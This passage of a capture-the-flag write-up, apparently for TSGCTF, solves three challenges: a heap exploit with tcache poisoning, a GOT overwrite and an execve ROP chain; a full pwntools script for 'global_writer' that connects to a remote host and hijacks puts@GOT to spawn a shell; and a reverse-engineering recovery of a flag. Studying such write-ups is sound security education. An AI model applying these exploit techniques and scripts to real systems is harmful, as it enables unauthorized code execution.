2. we write the mangled fd at ```CHUNK``` so that the allocator believes:
3
    head = CHUNK
4
    CHUNK->next decodes to TARGET
5
3. next allocation of same bin:
6
    pops CHUNK
7
    sets head to decoded TARGET
8
4. next allocation:
9
    returns TARGET (inside .got.plt)

this is the controlled allocation to GOT stage.

GOT overwrite ==> ret n pivot

why does GOT work in this static binary

in static builds we still have a .got.plt populated by startup relocations (like IRELATIVE/IFUNC entries for optimized routines like memchr, strcmp, and more).

overwiting one of these slots results in the program later calling memchr(), the call goes through an entry we overwrote, and we redirect execution to a gadget.

why we use “ret n” (stack adjust pivot)

“ret n” style gadget is a pivot primitive when we can not directly mov rsp, reg, but we can land in a sequence that consumes a controlled return address then skips forward by a constant and returns again.

we use this to land execution onto a ROP chain we placed inside a large controlled buffer, aligned at a known offset. we implement this as follows:

1
p += p64(next(elf.gadget("ret;"))) * (0x200//8)
2
p += <more> pop rdi; pop rsi; pop rdx; pop rax; syscall <more>

this tail is the “ROP runway” the pivot lands on.

idea, summarized

use tcache poisoning to write into .got.plt ==> overwrite an IFUNC slot that will be called during parsing/dumping (memchr / strcmp) ==> point it at a pivot gadget (ret n) ==> pivot causes RSP to land into our controlled buffer region ==> ROP begins

execve ROP / solve

we just do :

1
rop.call('execve', [b'/bin/sh', [[b'/bin/sh'], [b'-p'], [b'-c'], [b'cat flag-*'], 0], 0])

summary

<?xml ...?> stores xml_decl_loc = &originals.back()
push >10 <root> ==> originals realloc ==> xml_decl_loc dangling
second <?xml ...?> ==> delete(xml_decl_loc) frees the wrong address
by heap feng shui + rng (1/4096), that wrong free hits tcache_perthread_struct
allocate a 0x280-sized chunk ==> reclaim tcache struct ==> overwrite:
counts[] set non-zero
entries[] set to controlled chunk addresses in .bss
use .bss fake chunks with safe-linking to make next allocation return .got.plt
overwrite a .got.plt IFUNC slot ==> redirect a later call into a pivot gadget (ret n)
pivot lands on our ROP runway inside controlled memory
ROP does execve(“/bin/sh”)

pwn - global writer

tlsbollei@tlsbollei mnt/.../global_writer file chal
chal: ELF 64-bit LSB executable, x86-64, version 1 (SYSV), dynamically linked, interpreter /lib64/ld-linux-x86-64.so.2, BuildID[sha1]=f5fdd19da83b1bc2395b87e2ccd73389b1cad9da, for GNU/Linux 3.2.0, not stripped
tlsbollei@tlsbollei mnt/.../global_writer checksec chal
[*] '/mnt/c/Users/tlsbo/Downloads/global_writer/global_writer/chal'
    Arch:       amd64-64-little
    RELRO:      Partial RELRO
    Stack:      Canary found
    NX:         NX enabled
    PIE:        No PIE (0x400000)
    SHSTK:      Enabled
    IBT:        Enabled
    Stripped:   No

immediately notice the bug -

1
void edit(void)
2

3
{
4
  long lVar1;
5
  int iVar2;
6
  long in_FS_OFFSET;
7

8
  lVar1 = *(long *)(in_FS_OFFSET + 0x28);
9
  while( true ) {
10
    printf("index? > ");
11
    iVar2 = __isoc99_scanf(&DAT_00402032,&idx);
12
    if (iVar2 != 1) {
13
      handle_error();
14
    }
15
    if (idx == -1) break;
16
    printf("value? > ");
17
    iVar2 = __isoc99_scanf(&DAT_00402032,&values + idx);
18
    if (iVar2 != 1) {
19
      handle_error();
20
    }
21
  }
22
  puts(msg);
23
  printf("Array: ");
24
  for (i = 0; i < 0x10; i = i + 1) {
25
    printf("%d ",(ulong)(uint)(&values)[i]);
26
  }
27
  putchar(10);
28
  if (lVar1 != *(long *)(in_FS_OFFSET + 0x28)) {
29
                    /* WARNING: Subroutine does not return */
30
    __stack_chk_fail();
31
  }
32
  return;
33
}

bug and solve

there is no bounds check on idx in values[idx] write. only checks for idx == -1 to exit loop, which becomes our exploit trigger. from this, we can have an arbitrary write relative to values base, and given index can be negative or large, allowing for writes before and after the values array.

variables

now we have the addresses of the two variables msg and values. we see the program calling puts(msg);, and as we have a constraint write-what-where primitive we can overwrite the GOT entry of puts@GOT to point to the stub system@plt, and we can also overwrite the msg variable, turning puts(msg) into system("sh").

objdump -R chal | grep ' puts@' confirms 0000000000404020 R_X86_64_JUMP_SLOT puts@GLIBC_2.2.5, objdump -d chal | grep '<system@plt>' confirms 00000000004010f0 <system@plt>:

because values is int values[SIZE], so the write target becomes write_addr=&values[0]+4⋅idx. now we just resolve at what index to point what, bear with my drawings

variable

Important (the final plan)

write command string “sh\0” to values[0] at 0x4040c0 as little endian 32 bit int 0x00006873 = 26739, overwrite msg pointer to point to 0x4040c0, writing 4211904 at index -22 (see above), hijack puts@GOT to point to system@plt at index -40, exit loop with index -1 to pop shell!

1
from pwn import *
2

3
elf = ELF('./chal')
4
context.binary = elf
5

6
#p = process('./chal')
7
p = remote("34.84.25.24", 58554)
8

9
values_addr = 0x4040c0
10
msg_ptr_addr = 0x404068
11
puts_got = 0x404020
12
system_plt = 0x4010f0
13

14
msg_offset = (msg_ptr_addr - values_addr) // 4  # -22
15
puts_offset = (puts_got - values_addr) // 4     # -40
16

17
sh_value = u32(b"sh\x00\x00")  # 26739
18
p.sendlineafter(b'> ', b'0')
19
p.sendlineafter(b'> ', str(sh_value).encode())
20
p.sendlineafter(b'> ', str(msg_offset).encode())
21
p.sendlineafter(b'> ', str(values_addr).encode())
22
p.sendlineafter(b'> ', str(puts_offset).encode())
23
p.sendlineafter(b'> ', str(system_plt).encode())
24
p.sendlineafter(b'> ', b'-1')
25

26
p.interactive()

variabe

rev - shadow_spider_network

entry point and red herring

1
void __fastcall __noreturn main(int a1, char **a2, char **a3)
2
{
3
  printf("FLAG> ");
4
  if ( (unsigned int)sub_404450() )
5
    puts("Wrong");
6
  else
7
    puts("Correct!");
8
  exit(0);
9
}

the function sub_40419F() implements RC4 KSA+PRGA using a global key string s

1
__int64 __fastcall sub_40419F(const char *a1)
2
{
3
  char v2; // [rsp+11h] [rbp-12Fh]
4
  char v3; // [rsp+13h] [rbp-12Dh]
5
  int i; // [rsp+14h] [rbp-12Ch]
6
  int j; // [rsp+14h] [rbp-12Ch]
7
  int v6; // [rsp+18h] [rbp-128h]
8
  int v7; // [rsp+1Ch] [rbp-124h]
9
  int v8; // [rsp+20h] [rbp-120h]
10
  int k; // [rsp+24h] [rbp-11Ch]
11
  size_t v10; // [rsp+28h] [rbp-118h]
12
  _BYTE v11[264]; // [rsp+30h] [rbp-110h]
13
  unsigned __int64 v12; // [rsp+138h] [rbp-8h]
14

15
  v12 = __readfsqword(0x28u);
16
  v10 = strlen(s);
17
  sub_404172();
18
  for ( i = 0; i <= 255; ++i )
19
    v11[i] = i;
20
  LOBYTE(v6) = 0;
21
  for ( j = 0; j <= 255; ++j )
22
  {
23
    v6 = (unsigned __int8)(v11[j] + v6 + s[j % v10]);
24
    v3 = v11[j];
25
    v11[j] = v11[v6];
26
    v11[v6] = v3;
27
  }
28
  if ( strlen(a1) != 40 )
29
    return 1;
30
  LOBYTE(v8) = 0;
31
  LOBYTE(v7) = 0;
32
  for ( k = 0; k <= 47; ++k )
33
  {
34
    v7 = (unsigned __int8)(v7 + 1);
35
    v8 = (unsigned __int8)(v11[v7] + v8);
36
    v2 = v11[v7];
37
    v11[v7] = v11[v8];
38
    v11[v8] = v2;
39
    if ( (v11[(unsigned __int8)(v11[v7] + v11[v8])] ^ a1[k]) != byte_4050A0[k] )
40
      return 1;
41
  }
42
  return 0;
43
}

it then compares 48 bytes against byte_4050A0. however, it also enforces strlen(a1)==40, which is incompatible with the real 82 byte flag

1
_BYTE byte_4050A0[48] =
2
{
3
  -63,
4
  120,
5
  -93,
6
  27,
7
  -32,
8
  52,
9
  -120,
10
  10,
11
  14,
12
  119,
13
  -17,
14
  -19,
15
  128,
16
  -63,
17
  -65,
18
  -22,
19
  107,
20
  -71,
21
  -53,
22
  -108,
23
  53,
24
  89,
25
  -20,
26
  -50,
27
  93,
28
  -35,
29
  102,
30
  82,
31
  30,
32
  3,
33
  85,
34
  -91,
35
  128,
36
  -101,
37
  -100,
38
  -69,
39
  -93,
40
  -57,
41
  102,
42
  -81,
43
  72,
44
  -59,
45
  89,
46
  115,
47
  62,
48
  -43,
49
  -49,
50
  -33
51
}; // weak
52
char *s = "the_flying_cabbage_eats_purple_clocks"; // idb

this strongly suggests that RC4 is not the correct verification path

the real bug

the input is read with %s into a 56 byte stack buffer, which is a classic overflow. the function also has as canary which reads fs:0x28.

1
__int64 sub_404450()
2
{
3
  char v1[56]; // [rsp+0h] [rbp-40h] BYREF
4
  unsigned __int64 v2; // [rsp+38h] [rbp-8h]
5

6
  v2 = __readfsqword(0x28u);
7
  __isoc99_scanf("%s", v1);
8
  return sub_40419F(v1);
9
}

this is the BOP entry, you feed an 82 byte string (the real flag) smashing past 56 bytes.

tracerpid check

before our fake RC4 works begins, sub_404172() calls sub_40408F() which reads /proc/self/status and parses TracerPid.

1
_BOOL8 sub_40408F()
2
{
3
  ...
4
  stream = fopen("/proc/self/status", "r");
5
  v2 = 0;
6
  for ( i = fgets(s1, 256, stream); i; i = fgets(s1, 256, stream) )
7
  {
8
    if ( !strncmp(s1, "TracerPid:", 0xAu) )
9
    {
10
      v2 = atoi(v5);
11
      break;
12
    }
13
  }
14
  sub_403ED5();
15
  fclose(stream);
16
  return v2 != 0;
17
}

… called by…

1
_BOOL8 sub_404172()
2
{
3
  _BOOL8 result; // rax
4

5
  result = sub_40408F();
6
  if ( result )
7
  {
8
    sub_403ED5();
9
    exit(1);
10
  }
11
  return result;
12
}

which is a cool anti-debugging check which forces ut to solve this offline statically. big problem returning back to our stack canary - how can we do anything if main is gated through an overflow and a canary is in place?

alternate stack and handler for SIGILL and SIGSEGV

the program sets up an alternate signal stack and isntall the same handler for SIGSEV (11) and SIGILL (4)

1
unsigned __int64 sub_403F4F()
2
{
3
  size_t v0; // rax
4
  struct sigaltstack s; // [rsp+0h] [rbp-C0h] BYREF
5
  struct sigaction act; // [rsp+20h] [rbp-A0h] BYREF
6
  unsigned __int64 v4; // [rsp+B8h] [rbp-8h]
7

8
  v4 = __readfsqword(0x28u);
9
  memset(&s, 0, sizeof(s));
10
  v0 = sysconf(250);
11
  s.ss_sp = malloc(v0);
12
  s.ss_size = sysconf(250);
13
  s.ss_flags = 0;
14
  if ( sigaltstack(&s, 0) == -1 )
15
    exit(1);
16
  sub_403ED5();
17
  memset(&act, 0, sizeof(act));
18
  act.sa_handler = (__sighandler_t)sub_401363;
19
  sigemptyset(&act.sa_mask);
20
  act.sa_flags = 134217732;
21
  if ( sigaction(11, &act, 0) == -1 )
22
    exit(1);
23
  if ( sigaction(4, &act, 0) == -1 )
24
    exit(1);
25
  return v4 - __readfsqword(0x28u);
26
}

GOT, plt patching, state counter, and why overflow leads into the handler machine

two GOT-like pointers are explicitly present as globals

1
_UNKNOWN *off_407040 = &_stack_chk_fail; // weak
2
_UNKNOWN *off_407088 = &_isoc99_scanf; // weak
3
char byte_4070B8; // weak
4
int dword_4070BC; // weak

the helper sub_403ED5() mutates off_407040 depending on a counter dword_4070BC, then increments it

1
__int64 sub_403ED5()
2
{
3
  if ( dword_4070BC == 1 )
4
  {
5
    off_407040 = &loc_401016;
6
  }
7
  else if ( dword_4070BC == 2 )
8
  {
9
    off_407040 = sub_401080;
10
  }
11
  else if ( dword_4070BC )
12
  {
13
    off_407040 = (_UNKNOWN *)(dword_4070BC + 307656848LL);
14
  }
15
  else
16
  {
17
    off_407040 = sub_401080;
18
  }
19
  return (unsigned int)++dword_4070BC;
20
}

this is what makes stack smashing / faulting keep stepping through custom control flow instead of immediately terminating normally. when the function returns, it calls __stack_chk_fail(), but the program has patched off_407040 (the GOT pointer to __stack_chk_fail), instead of crashing, it jumps to a custom handler, sub_401363(), which is a byte-check state machine, and looks as follows:

1
_QWORD *__fastcall sub_401363(__int64 a1, __int64 a2, _QWORD *a3)
2
{
3
  __int64 v3; // rax
4
  _QWORD *result; // rax
5
  ...
6
  v3 = a3[21];
7
  if ( v3 == 0x8020392031LL )
8
  {
9
    if ( *(_BYTE *)(a3[15] - 27LL) == 100 )
10
    {
11
      off_407040 = (_UNKNOWN *)218209785;
12
      v45 = a3[20];
13
      if ( (v45 & 0xF) == 8 )
14
        v45 -= 8;
15
      a3[20] = v45;
16
      a3[21] = &loc_404486;
17
      return a3;
18
    }
19
    else
20
    {
21
      a3[21] = sub_401080;
22
      return a3;
23
    }
24
  }
25
and more lines like these
26
}

the signal handler uses the saved context array a3[]. two indices are key :

vc3 = a3[21]; is treated as the current state (RIP or dispatch tag)
memory around a3[15] is dereferenced and compared to constants (the flag bytes)

this is the entire core mechanism :

1
byte check: *(_BYTE *)(a3[15] - 27LL) == 100
2
on success: change RIP: a3[21] = &loc_404486;
3
on failure: crash: a3[21] = sub_401080;

the handler contains checks with offsets ranging from -64 up to +17, which is 82 total!

tail logic looks as follows:

1
if ( (_UNKNOWN *)v3 != &locret_40101A )
2
  goto LABEL_482;
3
if ( *(_WORD *)(a3[15] + 17LL) == 125 )
4
{
5
  a3[20] -= 8LL;
6
  off_407040 = (_UNKNOWN *)3735928559LL;
7
  ++dword_4070BC;
8
  a3[21] = 0x1890909090LL;
9
}
10
else
11
{
12
  a3[21] = sub_401080;
13
}
14
return a3;

and the start, prefix is also present as explicit byte checks:

1
case 307656869LL:
2
  if ( *(_BYTE *)(a3[15] - 64LL) == 84 )
3
  {
4
    off_407088 = (_UNKNOWN *)39883721;
5
    a3[21] = &loc_404472;
6
  }
7
  else
8
  {
9
    a3[21] = sub_401080;
10
  }
11
  result = a3;
12
  break;
13
c
14
if ( v3 == 165945142 )
15
{
16
  if ( *(_BYTE *)(a3[15] - 63LL) == 83 )
17
  {
18
    off_407040 = (_UNKNOWN *)41962613;
19
    v9 = a3[20];
20
    if ( (v9 & 0xF) == 8 )
21
      v9 -= 8;
22
    a3[20] = v9;
23
    a3[21] = &loc_4044A1;
24
    return a3;
25
  }
26
  else
27
  {
28
    a3[21] = sub_401080;
29
    return a3;
30
  }
31
}
32
c
33
if ( v3 == 4211843 )
34
{
35
  if ( *(_BYTE *)(a3[15] - 62LL) == 71 )
36
  {
37
    off_407088 = (_UNKNOWN *)33986443;
38
    a3[21] = &loc_404472;
39
  }
40
  else
41
  {
42
    a3[21] = sub_401080;
43
  }
44
  return a3;
45
}
46
c
47
case 307656851LL:
48
  if ( *(_BYTE *)(a3[15] - 61LL) == 67 )
49
  {
50
    off_407040 = (_UNKNOWN *)7467883;
51
    v12 = a3[20];
52
    if ( (v12 & 0xF) == 8 )
53
      v12 -= 8;
54
    a3[20] = v12;
55
    a3[21] = &loc_404486;
56
    result = a3;
57
  }
58
  else
59
  {
60
    a3[21] = sub_401080;
61
    result = a3;
62
  }
63
  break;
64
c
65
case 307656859LL:
66
  if ( *(_BYTE *)(a3[15] - 60LL) == 84 )
67
  {
68
    off_407088 = (_UNKNOWN *)232629856;
69
    a3[21] = &loc_404472;
70
  }
71
  else
72
  {
73
    a3[21] = sub_401080;
74
  }
75
  result = a3;
76
  break;
77
c
78
if ( v3 == 263109988 )
79
{
80
  if ( *(_BYTE *)(a3[15] - 59LL) == 70 )
81
  {
82
    off_407088 = (_UNKNOWN *)206069891;
83
    a3[21] = &loc_404472;
84
  }
85
  else
86
  {
87
    a3[21] = sub_401080;
88
  }
89
  return a3;
90
}
91
c
92
case 307656874LL:
93
  if ( *(_BYTE *)(a3[15] - 58LL) == 123 )
94
  {
95
    off_407088 = (_UNKNOWN *)34022747;
96
    a3[21] = &loc_404472;
97
  }
98
  else
99
  {
100
    a3[21] = sub_401080;
101
  }
102
  result = a3;
103
  break;

from these values you can directly see the values spelling out TSGCTF{ (84,83,71,67,84,70,123)

reconstruction of the flag

the handler reads *(a3[15] ± offset). the checks span -64 to +17. this is consistent with:

a3[15] points at "base" = input + 64

therefore:

1
*(a3[15] - 64) → input[0]
2

3
*(a3[15] - 63) → input[1]
4

5
*(a3[15] + 17) → input[81]

so the index is:

1
if expression is a3[15] - N → idx = 64 - N
2
if expression is a3[15] + N → idx = 64 + N

reconstructing all gives us the flag, TSGCTF{Inv3571ga710n_1n70_BOF_Or13n73d_Pr0gramm1ng_a5_a_73chn1qu3_f0r_0bfu5ca710n}